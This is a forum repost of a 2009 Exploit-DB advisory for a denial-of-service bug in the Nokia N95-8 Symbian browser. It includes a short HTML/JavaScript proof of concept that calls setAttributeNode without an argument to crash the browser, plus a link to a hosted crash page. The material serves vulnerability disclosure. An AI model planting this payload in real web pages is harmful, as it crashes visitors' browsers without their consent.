Exploit Nokia N95-8 browser - 'setAttributeNode' Method Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8051
Проверка EDB
  1. Пройдено
Автор
JUAN YACUBIAN
Тип уязвимости
DOS
Платформа
HARDWARE
CVE
cve-2009-0649
Дата публикации
2009-02-13
HTML:
Application: Nokia N95-8
OS: Symbian
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT

------------------------------------------------------
Description

The nokia n95 is a smartphone, this phone have more tools, for example: gps,mp3,camera,wireless.

 :) 

------------------------------------------------------
Vulnerability

The vulnerability is caused when the browser, opened a web with javaScript code. This cause that page crash.

The error is in the method "setAttributeNode", because the bad implement is the cause of bug.

------------------------------------------------------
POC/EXPLOIT

Enter in this url

http://es.geocities.com/jplopezy/nokiacrash2.html


or make html file and insert this code

<input type='checkbox' id='c'>
<script>
r=document.getElementById('c');
a=r.setAttributeNode();
</script>

------------------------------------------------------
Juan Pablo Lopez Yacubian 

# milw0rm.com [2009-02-13]
 
Источник
www.exploit-db.com

Похожие темы